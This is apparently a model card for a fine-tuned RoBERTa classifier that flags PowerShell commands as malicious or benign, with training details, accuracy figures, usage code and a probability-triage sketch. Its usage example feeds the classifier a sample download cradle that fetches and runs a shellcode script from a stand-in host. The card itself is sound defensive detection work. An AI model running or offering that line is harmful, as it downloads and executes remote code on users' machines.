# neon-roberta-finetuned-powershell-detector

## ⚡ PowerShell Command Classifier (RoBERTa-base fine-tuned)

This model is a fine-tuned [RoBERTa-base](https://huggingface.co/roberta-base) model for binary classification of PowerShell scripts. It predicts whether a given PowerShell command or script is **malicious (1)** or **benign (0)**.

---

## 📦 Model Details

- **Base model**: `roberta-base`
- **Task**: Sequence Classification
- **Classes**:
  - `0`: Benign
  - `1`: Malicious
- **Dataset**: Custom-labeled dataset of real-world PowerShell commands
- **Input format**: Raw PowerShell command text (single string)
- **Tokenizer**: `roberta-base` tokenizer

---

## Training Details

- **Epochs**: 3
- **Batch size**: Varies with the setup (e.g. 16 or 32 with gradient accumulation)
- **Optimizer**: AdamW
- **Learning rate**: 2e-5 with linear decay
- **Loss**: Cross-entropy
- **Hardware**: Fine-tuned on an AWS `g5.4xlarge` instance with an A10G GPU

---

## 📈 Evaluation Results

| Metric            | Value   |
|-------------------|---------|
| Accuracy          | ~98.7%  |
| Eval Loss         | ~0.089  |
| Final Train Loss  | ~0.058  |
| Runtime per Epoch | ~2 min  |

---

## 🚀 How to Use

```python
from transformers import AutoTokenizer, AutoModelForSequenceClassification
import torch

# Replace YOUR_USERNAME with the account that hosts the model.
MODEL_ID = "YOUR_USERNAME/finetuned-roberta-powershell-detector"

tokenizer = AutoTokenizer.from_pretrained(MODEL_ID)
model = AutoModelForSequenceClassification.from_pretrained(MODEL_ID)


def classify_powershell(script):
    # truncation=True cuts input that exceeds the tokenizer's maximum length.
    inputs = tokenizer(script, return_tensors="pt", truncation=True, padding=True)
    with torch.no_grad():  # inference only, no gradients needed
        outputs = model(**inputs)
    logits = outputs.logits
    prediction = torch.argmax(logits, dim=1).item()  # 0 = benign, 1 = malicious
    return "malicious" if prediction == 1 else "benign"


example = "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/Invoke-Shellcode.ps1');"
print(classify_powershell(example))
```

---

## Intended Use

This model is meant for **PowerShell threat detection** and research use in **cybersecurity automation pipelines**, such as:

- Security Operations Center (SOC) triage tools
- Malware analysis and sandboxing systems
- SIEM/EDR integrations
- AI-assisted incident response

---

## ⚠️ Limitations & Considerations

- This model is trained on a specific dataset of encoded PowerShell scripts and may not generalize well to **obfuscated** or **novel attack patterns**.
- It should not be used as the sole decision-maker for security classification; it works best as one signal in a larger detection system.
- It may produce false positives for rare or edge-case benign scripts.

---

## 📄 License

MIT or Apache 2.0 (specify your license)

---

## 🙏 Acknowledgements

- Base model from [RoBERTa (Liu et al., 2019)](https://arxiv.org/abs/1907.11692)
- Transformers by [Hugging Face](https://huggingface.co/transformers/)
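
---

## Example: Using the Score as a Signal

The limitations listed in this card recommend treating the prediction as one signal rather than a final verdict. The following is a minimal sketch of one way to do that, not part of the released model: it turns the two output logits into a probability for the malicious class and maps it to a coarse action. The function names (`malicious_probability`, `triage`) and both thresholds are hypothetical and chosen only for illustration; suitable cut-offs would need to be tuned on your own validation data.

```python
import math

# Hypothetical cut-offs for illustration only; tune them on your own data.
REVIEW_THRESHOLD = 0.50
ALERT_THRESHOLD = 0.90


def malicious_probability(logits):
    """Softmax over [benign_logit, malicious_logit]; returns P(malicious)."""
    benign, malicious = logits
    # Subtract the larger logit before exponentiating for numerical stability.
    m = max(benign, malicious)
    e_benign = math.exp(benign - m)
    e_malicious = math.exp(malicious - m)
    return e_malicious / (e_benign + e_malicious)


def triage(logits):
    """Map a logit pair to a coarse action plus the underlying probability."""
    p = malicious_probability(logits)
    if p >= ALERT_THRESHOLD:
        return "alert", p
    if p >= REVIEW_THRESHOLD:
        return "review", p
    return "pass", p
```

With the model loaded as in the usage snippet, the logit pair for a single script can be obtained with `outputs.logits[0].tolist()` and passed to `triage`. Returning the probability alongside the action lets a downstream system (for example a SIEM rule) combine it with other evidence instead of relying on the label alone.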